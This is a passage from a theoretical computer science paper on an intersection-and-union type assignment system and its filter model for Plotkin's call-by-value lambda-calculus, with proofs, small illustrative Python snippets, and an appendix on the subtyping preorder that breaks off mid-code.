\[(Ax): \Gamma, x: A \vdash x: A \qquad (v): \Gamma \vdash M : \nu \text{ (if } M \text{ is a variable or an abstraction)}\]
\[(\rightarrow I): \frac{\Gamma, x: A \vdash M : B}{\Gamma \vdash \lambda x. M : A \rightarrow B}\]
\[(\rightarrow E): \frac{\Gamma \vdash M : A \rightarrow B \quad \Gamma \vdash N : A}{\Gamma \vdash MN : B}\]
\[(\land I): \frac{\Gamma \vdash M : A \quad \Gamma \vdash M : B}{\Gamma \vdash M : A \land B}\]
\[(\leq): \frac{\Gamma \vdash M : A}{\Gamma \vdash M : B} (A \leq B)\]
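As a small example (ours), let \( a \) be a propositional variable, which may occur in a basis since it is \( \lor \)-prime by Theorem 2.6(i). Then

\[
x : a \vdash x : a \quad \text{by } (Ax), \qquad
\vdash \lambda x.x : a \rightarrow a \quad \text{by } (\rightarrow I), \qquad
\vdash \lambda x.x : \nu \quad \text{by } (v),
\]

and by \( (\land I) \), \( \vdash \lambda x.x : (a \rightarrow a) \land \nu \).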
This system differs from that in [2] not just because of the syntax of types and the definition of the \(\leq\) relation, but also because of the restriction (Definition 3.1(iii)) on assumptions and of rule (\(v\)).
If we allow assumptions with predicates which are not \(\lor\)-prime, then typing is not preserved under \(\beta_\nu\)-reduction. In fact, suppose that \(A, B\) and \(C\) are unrelated formulae (distinct propositional variables, say). Then we can deduce both \(x : A \rightarrow C, y : A \land B \vdash xy : C\) and \(x : B \rightarrow C, y : A \land B \vdash xy : C\), hence
\[y : A \land B \vdash \lambda x. xy : ((A \rightarrow C) \rightarrow C) \land ((B \rightarrow C) \rightarrow C) \sim ((A \rightarrow C) \lor (B \rightarrow C)) \rightarrow C,\]
by rules \((\rightarrow I), (\land I)\) and \((\leq)\). Suppose that we relax the restriction on the assumptions, and consider \(z : (A \rightarrow C) \lor (B \rightarrow C)\). Then by rule \((\rightarrow E)\) and the admissibility of weakening we have:
\[z : (A \rightarrow C) \lor (B \rightarrow C), y : A \land B \vdash (\lambda x. xy)z : C.\]
Now \((\lambda x. xy)z\) \(\beta_\nu\)-reduces to \(zy\), but \(z : (A \rightarrow C) \lor (B \rightarrow C), y : A \land B \not\vdash zy : C\). This is an easy consequence of the Generation Lemma below (Lemma 3.4).
A second remark concerns rule \((v)\). Compared with [2], this rule is close to rule \((\omega)\):
\[(\omega):\;\; \Gamma \vdash M : \omega\]
of [2], but for the restriction on the form of \(M\). In fact, in the present system it is not true that any term has a type: a typical un-typeable term is \(\Omega \equiv (\lambda x. xx)(\lambda x. xx)\). As a matter of fact, in our system only terms which are \(\beta_\nu\)-convertible to values have a type in the empty basis, hence (also) type \(\nu\). This is a basic choice: as terms will be discriminated according to the types we can assign to them, the fact that “divergent” closed terms (which are not \(\beta_\nu\)-convertible to a value) have no type will identify all of them.
In contrast, in [2] any term has a type, at least the “universal type” \(\omega\) (trivially) and also type \(\omega \rightarrow \omega\), because of the axiom \(\omega \leq \omega \rightarrow \omega\). Had we introduced here the universal type \(\omega\), serious problems would immediately have arisen. Indeed, one would have, e.g., that \(\vdash (\lambda xy. y)\Omega : A \rightarrow A\). But, once the inequation \(\omega \leq \omega \rightarrow \omega\) has been dropped, we expect, as it happens in all standard models of call-by-value \(\lambda\)-calculus, that arrow types (in the empty basis) characterize terms evaluating to a value (see, e.g. [5]). But then \((\lambda xy. y)\Omega\) should be itself \(\beta_\nu\)-convertible with a value, which is not.
The next lemmas are routine, but essential for the technical development: the essence is that variables can be substituted by terms having the same type, and that, under certain conditions, the rules of the system can be reversed.
Lemma 3.2 (Syntactical properties)
i) (weakening) If \( \Gamma \vdash M : A \) then \( \Gamma, x : B \vdash M : A \).
ii) (thinning) If \( \Gamma \vdash M : A \) then \( \Gamma{\upharpoonright}M \vdash M : A \), where \( \Gamma{\upharpoonright}M = \{ x : B \in \Gamma \mid x \in FV(M) \} \).
iii) (substitution) If \( \Gamma, x : A \vdash M : B \) and \( \Gamma \vdash N : A \) then \( \Gamma \vdash M[N/x] : B \).
Proof: All statements above are proved by induction on derivations. In particular (iii) is proved by induction on the derivation of \( \Gamma, x : A \vdash M : B \). We only observe that, if the last rule is \((v)\), then two cases are possible, according to the form of \( M \):
Case \( M \equiv y \): if \( y \equiv x \) then \( y[N/x] \equiv N \) and we have, using the hypothesis \( \Gamma \vdash N : A \) and rule \((\leq)\), that \( \Gamma \vdash N : \nu \); otherwise, if \( y \not\equiv x \) then \( y[N/x] \equiv y \), and \( \Gamma \vdash y : \nu \) by rule \((v)\).
Case \( M \equiv \lambda y. M' \): then \( (\lambda y. M')[N/x] \equiv \lambda z. M'[z/y][N/x] \) (where \( z \) is a fresh variable), which is an abstraction; therefore \( \Gamma \vdash M[N/x] : \nu \) is an instance of rule \((v)\).
When restricting to \( \lor \)-prime formulae, some useful properties concerning the type assignment system clearly reflect properties of natural deduction systems for propositional logic.
Lemma 3.3
i) The following rule is admissible:
\[
(\leq)_L : \frac{\Gamma, x : A \vdash M : B}{\Gamma, x : C \vdash M : B} \quad (C \leq A \text{ and } C \text{ is } \lor\text{-prime})
\]
ii) If \( M : B \) is derived from \( M : A_1 \cdots M : A_n \) only by using rules \((\land I)\) and \((\leq)\), then \( A_1 \land \cdots \land A_n \leq B \).
Proof: (i) By induction on the derivation of \( \Gamma, x : A \vdash M : B \).
(ii) By induction on derivations.
The Generation Lemma allows for a reverse reading of the rules. In particular, it establishes that, if the subject of the conclusion is an application or an abstraction, then, under suitable hypotheses, we have information on types which can be given to its immediate subterms.
Lemma 3.4 (Generation Lemma)
i) If \( \Gamma \vdash x : A \) and \( A \not\sim v \) then, for some \( B, x : B \in \Gamma \) and \( B \leq A \).
ii) \( \Gamma \vdash MN : A \) iff \( \Gamma \vdash M : B \rightarrow A \) and \( \Gamma \vdash N : B \) for some \( B \).
iii) If \( \Gamma \vdash \lambda x. M : A \) and \( A \not\sim \nu \) then, for some \( I, B_i, C_i \), \( \Gamma, x : B_i \vdash M : C_i \) for all \( i \in I \), and \( \land_{i \in I} (B_i \rightarrow C_i) \leq A \).
iv) \( \Gamma \vdash \lambda x. M : B \rightarrow C \) and \( B \) is \( \lor\)-prime iff \( \Gamma, x : B \vdash M : C \).
Proof: i) Immediate, by Lemma 3.3 (ii).
ii) \((\Rightarrow)\) By induction on the derivation of \( \Gamma \vdash MN : A \). The only non-trivial case is when the last rule applied is \((\land I)\), i.e. \( A = A_1 \land A_2 \). Then
\[
\frac{\Gamma \vdash MN : A_1 \quad \Gamma \vdash MN : A_2}{\Gamma \vdash MN : A_1 \land A_2} \quad (\land I)
\]
is the last step. By induction, there are \( B_1, B_2 \) such that \( \Gamma \vdash M : B_i \rightarrow A_i \) and \( \Gamma \vdash N : B_i \) for \( i = 1, 2 \). Then
\[
\begin{array}{c}
\dfrac{\Gamma \vdash M : B_1 \rightarrow A_1}{\Gamma \vdash M : B_1 \land B_2 \rightarrow A_1}\;(\leq)
\qquad
\dfrac{\Gamma \vdash M : B_2 \rightarrow A_2}{\Gamma \vdash M : B_1 \land B_2 \rightarrow A_2}\;(\leq)
\\[2ex]
\Gamma \vdash M : (B_1 \land B_2 \rightarrow A_1) \land (B_1 \land B_2 \rightarrow A_2) \quad (\land I)
\\[1ex]
\Gamma \vdash M : B_1 \land B_2 \rightarrow A_1 \land A_2 \quad (\leq)
\end{array}
\]
and \( \Gamma \vdash N : B_1 \land B_2 \) by rule \((\land I)\), so we can take \( B = B_1 \land B_2 \).
(\( \Leftarrow \)) By rule \((\rightarrow E)\).
iii) The derivation of \( \Gamma \vdash \lambda x. M : A \) (\( A \not\sim \nu \)) has the shape:
\[
\begin{array}{c}
\dfrac{\Gamma, x : B_1 \vdash M : C_1}{\Gamma \vdash \lambda x. M : B_1 \rightarrow C_1}\;(\rightarrow I)
\quad \cdots \quad
\dfrac{\Gamma, x : B_n \vdash M : C_n}{\Gamma \vdash \lambda x. M : B_n \rightarrow C_n}\;(\rightarrow I)
\quad
\dfrac{}{\Gamma \vdash \lambda x. M : \nu}\;(v) \;\cdots
\\[2ex]
\vdots \;\; (\land I), (\leq)
\\[1ex]
\Gamma \vdash \lambda x. M : A
\end{array}
\]
then by Lemma 3.3 (ii)
\( \land_{i \in I} (B_i \rightarrow C_i) \land \nu \land \cdots \land \nu \leq A. \)
\( I \not= \emptyset \) because \( A \not\sim \nu \) and \( B_i \rightarrow C_i \leq \nu \) by (A1). Thus
\( \land_{i \in I} (B_i \rightarrow C_i) \leq A. \)
iv) By (iii) above, as \( B \rightarrow C \not\sim \nu \) by Theorem 2.6 (iii), we can assume \( A = B \rightarrow C \). Thus there exist \( I, B_i, C_i \) such that
\( \Gamma, x : B_i \vdash M : C_i \) for all \( i \in I \), and \( \land_{i \in I} (B_i \rightarrow C_i) \leq B \rightarrow C. \)
Since \( B \) is \( \lor \)-prime, by Theorem 2.6 (iv),
\( \exists J \subseteq I \; [\, \forall i \in J,\; B \leq B_i \;\text{ and }\; \land_{i \in J} C_i \leq C \,]. \)
Hence we have:
\[
\begin{array}{c}
\dfrac{\Gamma, x : B_i \vdash M : C_i \quad (B \leq B_i,\; B \text{ is } \lor\text{-prime})}{\Gamma, x : B \vdash M : C_i}\;(\leq)_L \quad (\forall i \in J)
\\[2ex]
\Gamma, x : B \vdash M : \land_{i \in J} C_i \quad (\land I)
\\[1ex]
\Gamma, x : B \vdash M : C \quad (\leq)
\end{array}
\]
The paper [1] considers a disjunction-elimination rule, which, as such, is not admissible in the present system. However, as in [5], a suitable restriction of it is admissible:
\[
\frac{\Gamma \vdash V : A \lor B \quad \Gamma, x : A \vdash M : C \quad \Gamma, x : B \vdash M : C}{\Gamma \vdash M[V/x] : C} \quad (V \text{ is a variable or an abstraction})
\]
In fact, if \( V \equiv y \) is a variable that does not occur in \( \Gamma \), then \( A \lor B \sim \nu \) (by Lemma 3.4 (i)); since \( \nu \) is \( \lor \)-prime, both \( A, B \sim \nu \), and the thesis follows from the Substitution Lemma (Lemma 3.2 (iii)). If \( y : D \) is in \( \Gamma \) then \( D \) is \( \lor \)-prime and \( D \leq A \lor B \); therefore, by rule (\( \leq \)), either \( \Gamma \vdash y : A \) or \( \Gamma \vdash y : B. \) In both cases, the thesis follows by substitution.
Suppose, instead, that \( V \equiv \lambda y. M \). For \( A \lor B \sim \nu \), we reason as in the previous case. Otherwise, if \( A \lor B \not\sim \nu \), then, by Lemma 3.4 (iii), \( \Gamma, y : D_i \vdash M : E_i \) for \( i \in I \) (for some finite \( I \) and types \( D_i, E_i \)), such that \( \land_{i \in I} (D_i \rightarrow E_i) \leq A \lor B. \) By (\( \rightarrow I \)) and (\( \land I \)), \( \Gamma \vdash \lambda y. M : \land_{i \in I} (D_i \rightarrow E_i); \) on the other hand, we know that \( \land_{i \in I} (D_i \rightarrow E_i) \) is \( \lor \)-prime by Theorem 2.6 (ii), hence either \( \Gamma \vdash \lambda y. M : A \) or \( \Gamma \vdash \lambda y. M : B \), and the result follows by substitution.
The restriction on the form of \( V \) is essential: notice that \( x : C \rightarrow A \lor B, y : C \vdash xy : A \lor B, \) but we cannot type, in the same basis, \( xy \) either by \( A \) or by \( B. \)
4 The call-by-value $\lambda$-calculus and its models
The type assignment system we have introduced does not respect the (unrestricted) $\beta$-rule, as it is the case, instead, for the system of [2]. More precisely, types are preserved neither under $\beta$-reduction, nor under $\beta$-expansion.
For example, one can deduce $(\lambda y. x y y)(u v) : C$ from the basis $\Gamma = \{ x : (A \rightarrow A \rightarrow C) \land (B \rightarrow B \rightarrow C), u : D \rightarrow A \lor B, v : D \}$ as follows:
\[
\begin{array}{ll}
\Gamma, y : A \vdash x : A \rightarrow A \rightarrow C & \text{by } (Ax), (\leq) \\
\Gamma, y : A \vdash y : A & \text{by } (Ax) \\
\Gamma, y : A \vdash xyy : C & \text{by } (\rightarrow E), \text{ twice} \\
\Gamma \vdash \lambda y. xyy : A \rightarrow C & \text{by } (\rightarrow I) \\
\Gamma \vdash \lambda y. xyy : B \rightarrow C & \text{similarly} \\
\Gamma \vdash \lambda y. xyy : (A \lor B) \rightarrow C & \text{by } (\land I), (\leq) \\
\Gamma \vdash uv : A \lor B & \text{by } (Ax), (\rightarrow E) \\
\Gamma \vdash (\lambda y. xyy)(uv) : C & \text{by } (\rightarrow E)
\end{array}
\]
One cannot deduce $C$ from $\Gamma$ for the normal form $x(uv)(uv)$. Also one can deduce $A \rightarrow A$ for $\lambda y. y$, but this type cannot be deduced for $(\lambda xy. y)((\lambda z. zz)(\lambda z. zz))$, which has no type at all.
Thus this type assignment system does not induce a $\lambda$-model. Instead it gives a model of the call-by-value $\lambda$-calculus. The call-by-value $\lambda$-calculus, as introduced by Plotkin [9], is obtained by restricting the $\beta$-rule to redexes whose argument is a value (i.e. a variable or an abstraction).
Definition 4.1 (Call-by-value $\lambda$-calculus) The set of values $Val \subseteq \Lambda$ is defined by
\[ Val = Var \cup \{ \lambda x. M | M \in \Lambda \} \]
where $Var$ is the set of term variables. The call-by-value $\beta$-reduction rule is
\[
(\beta_v) \ (\lambda x. M) N \rightarrow_v M[N/x] \text{ if } N \in Val.
\]
The contextual, reflexive, symmetric, and transitive closure of $\rightarrow_v$ is denoted by $=_{v}$.
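As a small executable illustration of \( (\beta_v) \), the following sketch implements one root-level reduction step on a toy term representation; the tuple encoding and all function names are our own, not from the paper.

```python
# Toy encoding of lambda-terms: ("var", x), ("lam", x, body), ("app", fun, arg).

def is_value(t):
    # Definition 4.1: values are variables and abstractions.
    return t[0] in ("var", "lam")

def subst(t, x, n):
    # Substitution t[n/x]; for simplicity we assume bound variables of t
    # are distinct from the free variables of n (no capture handling).
    tag = t[0]
    if tag == "var":
        return n if t[1] == x else t
    if tag == "lam":
        y, body = t[1], t[2]
        return t if y == x else ("lam", y, subst(body, x, n))
    return ("app", subst(t[1], x, n), subst(t[2], x, n))

def beta_v_step(t):
    # One root-level beta_v step: (lam x. M) N -> M[N/x], only if N is a value.
    if t[0] == "app" and t[1][0] == "lam" and is_value(t[2]):
        _, x, body = t[1]
        return subst(body, x, t[2])
    return None  # no beta_v redex at the root

I = ("lam", "x", ("var", "x"))
K = ("lam", "y", ("lam", "z", ("var", "y")))

print(beta_v_step(("app", I, K)))  # reduces: the argument K is a value
print(beta_v_step(("app", I, ("app", ("var", "u"), ("var", "v")))))  # None: uv is not a value
```

Note how the second call is blocked exactly by the side condition \( N \in Val \): an application such as \( uv \) is not a value, so \( (\lambda x. x)(uv) \) is not a \( \beta_v \)-redex.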
Models of call-by-value $\lambda$-calculus are a generalisation of $\lambda$-models, in which a distinguished subset $\mathcal{V}$ of an applicative structure $\mathcal{D}$ is meant to interpret values: if one takes $\mathcal{V} = D$, the following definition immediately coincides with the notion of syntactical $\lambda$-model of [7]. A slightly different definition can be found in [6]; the present one is from [10].
Definition 4.2 (Models of call-by-value $\lambda$-calculus) A model of call-by-value $\lambda$-calculus is a structure $\mathcal{M} = \langle \mathcal{D}, \mathcal{V}, \cdot, [\cdot]^{\mathcal{M}} \rangle$, such that $\cdot$ is a binary operation on $\mathcal{D}$, called application (i.e. $\cdot$ is an applicative structure), $\mathcal{V} \subseteq \mathcal{D}$ and, for any environment $\rho : \text{Var} \rightarrow \mathcal{V}$, $[\cdot]^{\mathcal{M}}$ is a map from $\Lambda$ to $\mathcal{D}$ satisfying (writing simply $[M]_{\rho}$ for $[M]^{\mathcal{M}}_{\rho}$):
i) $[x]_{\rho} = \rho(x)$
ii) $[MN]_{\rho} = [M]_{\rho} \cdot [N]_{\rho}$
iii) $[\lambda x. M]_{\rho} \cdot d = [M]_{\rho[x:=d]}$ if $d \in \mathcal{V}$
iv) $\forall x \in FV(M), \rho(x) = \rho'(x)$ implies $[M]_{\rho} = [M]_{\rho'}$
v) $[\lambda x. M]_{\rho} = [\lambda y. M[y/x]]_{\rho}$ if $y \notin FV(M)$
vi) $\forall d \in \mathcal{V}, [M]_{\rho[x:=d]} = [N]_{\rho[x:=d]}$ implies $[\lambda x. M]_{\rho} = [\lambda x. N]_{\rho}$
vii) \( M \in \text{Val} \Rightarrow [[M]]_{\rho} \in V \) for all \( \rho \).
The soundness of this definition is proved in [10]: we state this fact in the next lemma.
Lemma 4.3 If \( M =_v N \) then \( [[M]]^{\mathcal{M}}_\rho = [[N]]^{\mathcal{M}}_\rho \), for any model \( \mathcal{M} \) and environment \( \rho \).
In analogy with [2], we will define a model using the set \( \mathcal{F} \) of filters over \( L \), induced by the \( B^+ \) preorder \( \leq \). The set of \( \lor \)-prime filters, as suggested by the remark at the end of the previous section, is meant as the set of values. There is, however, a slight mismatch between the present notion of filter and the standard one: we shall admit \( \emptyset \) as an element of \( \mathcal{F} \).
As a matter of fact, we shall construct a model of the call-by-value \( \lambda \)-calculus out of the set of filters: the denotation of a term \( M \) is a filter, namely the set of all types (formulae) that can be assigned to \( M \). The fact that the empty set is considered as a filter is a consequence of our choice to use \( \nu \) as the type of values, and of the fact that closed terms which are not \( \beta_\nu \)-convertible to a value have no type at all.
Definition 4.4 (Filters)
i) A filter over \( B^+ \) is a set \( X \subseteq L \) such that
- if \( A \leq B \) and \( A \in X \) then \( B \in X \);
- if \( A, B \in X \), then \( A \land B \in X \).
ii) Let \( F \) be the set of all filters over \( B^+ \).
iii) A filter \( X \) over \( B^+ \) is a \( \lor \)-prime filter if \( A \lor B \in X \) implies either \( A \in X \) or \( B \in X \).
iv) Let \( P F \) be the set of \( \lor \)-prime filters on \( B^+ \) different from \( \emptyset \).
v) If \( X \subseteq L \), \( \uparrow X \) denotes the filter generated by \( X \).
vi) \( \uparrow A \) is short for \( \uparrow \{ A \} \).
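To make the two closure conditions of the definition concrete, here is a toy check on a finite lattice (the divisors of 12 under divisibility, with gcd as meet); the lattice and all names are our own stand-ins for the infinite type preorder \( \leq \).

```python
from math import gcd

# Divisors of 12, ordered by divisibility: a <= b iff a divides b; meet = gcd.
CARRIER = [1, 2, 3, 4, 6, 12]
leq = lambda a, b: b % a == 0

def is_filter(X):
    # Definition 4.4 (i): upward closed under <=, and closed under meets.
    upward = all(b in X for a in X for b in CARRIER if leq(a, b))
    meets = all(gcd(a, b) in X for a in X for b in X)
    return upward and meets

print(is_filter({2, 4, 6, 12}))  # True: upward closed and gcd-closed
print(is_filter({4, 6, 12}))     # False: gcd(4, 6) = 2 is missing
```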
\( \langle \mathcal{F}, \subseteq \rangle \) is a distributive lattice. As a domain it is algebraic, with finite (or compact) elements of the shape \( \uparrow A \). Now we observe that \( \uparrow B \) is \( \lor \)-prime if and only if \( B \) is \( \lor \)-prime; since any \( A \) is equivalent to a finite disjunction \( A_1 \lor \cdots \lor A_k \) of \( \lor \)-prime formulae, we conclude that any finite element of \( \mathcal{F} \) (namely any principal filter) factorizes into a finite intersection of \( \lor \)-prime filters: \( \uparrow (A_1 \lor \cdots \lor A_k) = \uparrow A_1 \cap \cdots \cap \uparrow A_k \).
\( \mathcal{F} \) is also a solution of the domain equation
\[ D \triangleleft [D \rightarrow_{\bot} D]_{\bot} \]
in the category of algebraic lattices, where \( [D \rightarrow_{\bot} D]_{\bot} \) denotes the lifted space of strict continuous functions from \( D \) to \( D \). In fact \( \emptyset \) and \( \uparrow \nu \) are respectively the bottom of \( \mathcal{F} \) and of \( [\mathcal{F} \rightarrow_{\bot} \mathcal{F}]_{\bot} \). Moreover \( \uparrow (A \rightarrow B) \) represents the strict step function \( f_{\uparrow A, \uparrow B} \), where as usual
\[ f_{a,b}(d) = \text{if } a \sqsubseteq d \text{ then } b \text{ else } \bot. \]
So, we can define the projection pair \( \langle F, G \rangle \), where \( F : \mathcal{F} \rightarrow [\mathcal{F} \rightarrow_{\bot} \mathcal{F}]_{\bot} \), \( G : [\mathcal{F} \rightarrow_{\bot} \mathcal{F}]_{\bot} \rightarrow \mathcal{F} \), and \( F \circ G = \mathrm{Id}_{[\mathcal{F} \rightarrow_{\bot} \mathcal{F}]_{\bot}} \), as follows:
\[ F(X) = \bigsqcup \{ f_{\uparrow A, \uparrow B} \mid A \to B \in X \} \]
\[ G(f) = \uparrow \{ A \to B \mid B \in f(\uparrow A) \} \cup \uparrow \nu. \]
Due to the presence of union types, we do not have an isomorphism between \( \mathcal{F} \) and \( [\mathcal{F} \rightarrow_{\bot} \mathcal{F}]_{\bot} \), since different filters represent the same function. For example, \( \uparrow(A \land C \rightarrow B \lor D) \sqsubseteq \uparrow((A \rightarrow B) \lor (C \rightarrow D)) \) and the inclusion is proper, but \( F(\uparrow((A \rightarrow B) \lor (C \rightarrow D))) = F(\uparrow(A \land C \rightarrow B \lor D)) \).
Definition 4.5 (Application) For $X, Y \in \mathcal{F}$, define
$$X \cdot Y = \{ A \mid \exists B \in Y,\; B \rightarrow A \in X \}.$$
Observe that $X \cdot \emptyset = \emptyset \cdot Y = \emptyset$.

Lemma 4.6 i) $X \cdot Y \in \mathcal{F}$ for all $X, Y \in \mathcal{F}$.
ii) $X \in \mathcal{F}$ is $\lor$-prime iff for every $B \in X$ there is a $\lor$-prime $C \in X$ with $C \leq B$.
Proof: i) First $X \cdot Y$ is upward closed: if $A \in X \cdot Y$ and $A \leq B$ then $C \rightarrow A \in X$, for some $C \in Y$. Then, by (R5), $C \rightarrow A \leq C \rightarrow B$, hence $C \rightarrow B \in X$, which is upward closed, so $B \in X \cdot Y$.
We now show that $X \cdot Y$ is closed under $\land$: let $A, B \in X \cdot Y$. By definition, there exist $A', B'$ such that $A', B' \in Y$, $A' \rightarrow A, B' \rightarrow B \in X$. By (R4), $A' \rightarrow A \leq (A' \land B') \rightarrow A$, and, similarly, $B' \rightarrow B \leq (A' \land B') \rightarrow B$. By (A7), $((A' \land B') \rightarrow A) \land ((A' \land B') \rightarrow B) \leq (A' \land B') \rightarrow (A \land B) \in X$, since $X$ is a filter. But $A' \land B' \in Y$, since $Y$ is a filter too, so we conclude that $A \land B \in X \cdot Y$.
ii) $(\Leftarrow)$ Let $A \lor B \in X$, then $C \leq A \lor B$, for some $\lor$-prime $C \in X$. Then immediately $C \leq A$ or $C \leq B$, so $A \in X$ or $B \in X$ since $X$ is upward closed.
$(\Rightarrow)$ By Proposition A.3, $B \sim m_{\lor}(B) = \bigvee_{i \in I} B_i$, where the $B_i$'s are $\lor$-prime by Theorem 2.6 (ii). As $X$ is $\lor$-prime, $B_i \in X$ for some $i \in I$, and clearly $B_i \leq B$.
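The application operation \( X \cdot Y = \{ A \mid \exists B \in Y,\; B \rightarrow A \in X \} \) can be sketched on finite sets standing in for filters (closure under \( \leq \) and \( \land \) is deliberately ignored here); the tuple encoding of arrow types is our own.

```python
def arrow(b, a):
    # Toy encoding of the arrow type B -> A.
    return ("arrow", b, a)

def apply_filters(X, Y):
    # X . Y = { A | exists B in Y with B -> A in X }
    return {t[2] for t in X if t[0] == "arrow" and t[1] in Y}

X = {arrow("B", "A"), arrow("C", "D"), ("var", "p", None)}
print(apply_filters(X, {"B"}))       # {"A"}: B -> A is in X and B is in Y
print(apply_filters(X, {"B", "C"}))  # {"A", "D"}
print(apply_filters(X, set()))       # set(): X . {} = {}
```

The last call illustrates the observation \( X \cdot \emptyset = \emptyset \): with no argument types available, no application type can be produced.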
The basic idea of the next definition is to interpret terms into $\mathcal{F}$ using the Leibnitzian principle for which objects are identified with the set of their properties (here formulae, or types).
Definition 4.7 (Term interpretation)
i) A basis $\Gamma$ agrees with an environment $\rho : \text{Var} \rightarrow \mathcal{P} \mathcal{F}$ (notation $\Gamma \models \rho$) iff $x : B \in \Gamma$ implies $B \in \rho(x)$.
ii) The interpretation of $\lambda$-terms induced by $\vdash$ is defined by
$$[[M]]^\mathcal{F}_\rho = \{ A \in L \mid \exists \Gamma \models \rho, \Gamma \vdash M : A \}.$$
The mapping $[[M]]^\mathcal{F}_\rho$ is actually an interpretation from $\Lambda$ to $\mathcal{F}$, as stated in the next Lemma.
Lemma 4.8 $[[M]]^\mathcal{F}_\rho \in \mathcal{F}$, for any $M \in \Lambda$ and environment $\rho : \text{Var} \rightarrow \mathcal{P} \mathcal{F}$.
Proof: By rules $(\leq)$ and $(\land)$.
The main fact we establish now about $\mathcal{F}$ is that, given the above definitions of application and interpretation, it is a (filter) model of the call-by-value $\lambda$-calculus.
Theorem 4.9 $\mathcal{M}_0 = \langle \mathcal{F}, \mathcal{P} \mathcal{F}, \cdot, [[\cdot]]^\mathcal{F}_\rho \rangle$ is a model of call-by-value $\lambda$-calculus.
Proof: By checking that all conditions of Definition 4.2 are satisfied.
i) If $A \in [[x]]^\mathcal{F}_\rho$, then $\Gamma \vdash x : A$ for some $\Gamma$ such that $\Gamma \models \rho$. If $A \not\sim \nu$ (otherwise the thesis follows from the fact that $\rho(x) \neq \emptyset$) then $x : B \in \Gamma$ for some $B \leq A$, by Lemma 3.4 (i). This implies that $B \in \rho(x)$ and, therefore, also that $A \in \rho(x)$.
On the other hand, if $A \in \rho(x)$, then $\{ x : A \} \models \rho$ and $x : A \vdash x : A$.
ii) Immediate by Lemma 3.4 (ii).
iii) Let $X \in \mathcal{P} \mathcal{F}$, then
$$A \in [\lambda x.M]_{\rho}^\mathcal{F} \cdot X \Rightarrow \exists B \in X,\; B \rightarrow A \in [\lambda x.M]_{\rho}^\mathcal{F}$$
$$\Rightarrow \exists C \in X,\; C \;\lor\text{-prime} \;\&\; C \rightarrow A \in [\lambda x.M]_{\rho}^\mathcal{F}$$
$$\Rightarrow \exists C \in X, \Gamma,\; C \;\lor\text{-prime} \;\&\; \Gamma \models \rho \;\&\; \Gamma \vdash \lambda x.M : C \rightarrow A$$
$$\Rightarrow \exists C \in X, \Gamma,\; \Gamma, x : C \models \rho[x := X] \;\&\; \Gamma, x : C \vdash M : A$$
$$\Rightarrow A \in [M]_{\rho[x := X]}^\mathcal{F}$$
Vice versa
$$A \in [M]_{\rho[x := X]}^\mathcal{F} \Rightarrow \exists B, \Gamma,\; \Gamma, x : B \models \rho[x := X] \;\&\; \Gamma, x : B \vdash M : A$$
$$\Rightarrow \exists B \in X, \Gamma,\; \Gamma \models \rho \;\&\; \Gamma \vdash \lambda x.M : B \rightarrow A$$
$$\Rightarrow \exists B \in X,\; B \rightarrow A \in [\lambda x.M]_{\rho}^\mathcal{F}$$
$$\Rightarrow A \in [\lambda x.M]_{\rho}^\mathcal{F} \cdot X.$$
iv), v), vi) Easy.
vii) If $M \equiv x \in \text{Var}$, then $[M]_{\rho}^F = \rho(x) \in \mathcal{P} \mathcal{F}$, because $\rho$ is a mapping from $\text{Var}$ to $\mathcal{P} \mathcal{F}$. Otherwise, suppose that $M \equiv \lambda x.M'$: then by Lemma 4.6 (ii), it suffices to prove that
$$B \in [\lambda x.M']_{\rho}^\mathcal{F} \Rightarrow \exists C \in [\lambda x.M']_{\rho}^\mathcal{F},\; C \leq B \;\&\; C \text{ is } \lor\text{-prime}.$$
Assume $B \in [\lambda x.M']_{\rho}^\mathcal{F}$, i.e. $\exists \Gamma \models \rho, \Gamma \vdash \lambda x.M' : B$. The case $B \sim \nu$ is trivial; let us suppose that $B \not\sim \nu$. By Lemma 3.4 (iii) we have that, for some $I, B_i$ and $C_i$,
$$\forall i \in I,\; \Gamma, x : B_i \vdash M' : C_i \;\text{ and }\; \land_{i \in I} (B_i \rightarrow C_i) \leq B.$$
Then $\land_{i \in I} (B_i \rightarrow C_i) \in [\lambda x.M']_{\rho}^\mathcal{F}$ by $(\rightarrow I)$ and $(\land I)$, where $\land_{i \in I} (B_i \rightarrow C_i)$ is $\lor$-prime by Theorem 2.6 (ii).
5 Conclusion
The fact that the system $B^+$ naturally gives a type assignment system for the call-by-value $\lambda$-calculus is a pleasant surprise. Indeed, something more should be true about our system. First, we strongly conjecture that an approximation theorem holds: given the right notion of approximant for the call-by-value $\lambda$-calculus (see e.g. [6]), we expect that the set of types that can be assigned to any term is exactly the set of all types that can be assigned to its approximate normal forms. Then some leading ideas of our construction, such as the fact that the closed terms which can be typed by $\nu$ are exactly the convergent “programs”, would have a clear and elegant proof.
There are, however, some open questions. First, we do not have a completeness theorem for the $B^+$-based type assignment system along the lines of [2]. A deeper analysis of the correspondence between the filter model construction and the semantics of relevant logics is still needed and, we believe, should lead to a better understanding even of the results we presently have.
References
Appendix A Properties of $\leq$
Specialisations of $\leq$ to the sets $T_i$ are now introduced, whose definition exploits the syntactical form of the types in $T_i$.
Definition A.1 $\leq_i \subseteq T_i \times T_i$ $(i = \rightarrow, \land, \lor, \land\lor, \lor\land)$ are the least preorders such that
$(\leq_\rightarrow)$: $A \leq_\rightarrow B \iff$ either $A = B$ or $B = \nu$ or $A = A_1 \rightarrow A_2, B = B_1 \rightarrow B_2$ and $B_1 \leq_\land A_1, A_2 \leq_\lor B_2$
$(\leq_\land)$: $\land_{i \in I} A_i \leq_\land \land_{j \in J} B_j$ (where $A_i, B_j \in T_\rightarrow$) $\iff \forall j \in J\, \exists i \in I, A_i \leq_\rightarrow B_j$
$(\leq_\lor)$: $\lor_{i \in I} A_i \leq_\lor \lor_{j \in J} B_j$ (where $A_i, B_j \in T_\land$) $\iff \forall i \in I\, \exists j \in J, A_i \leq_\land B_j$
$(\leq_{\land\lor})$: $\land_{i \in I} A_i \leq_{\land\lor} \land_{j \in J} B_j$ (where $A_i, B_j \in T_\lor$) $\iff \forall j \in J\, \exists i \in I, A_i \leq_\lor B_j$
$(\leq_{\lor\land})$: $\lor_{i \in I} A_i \leq_{\lor\land} \lor_{j \in J} B_j$ (where $A_i, B_j \in T_\land$) $\iff \forall i \in I\, \exists j \in J, A_i \leq_\land B_j$.
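The alternating quantifier patterns can be made concrete: comparing conjunctions requires every right conjunct to be covered by some left conjunct, while comparing disjunctions requires every left disjunct to sit below some right disjunct. A toy sketch, with divisibility standing in for the base preorder (all names are ours):

```python
def leq_conj(As, Bs, leq):
    # /\ As <= /\ Bs  iff  forall j exists i, A_i <= B_j
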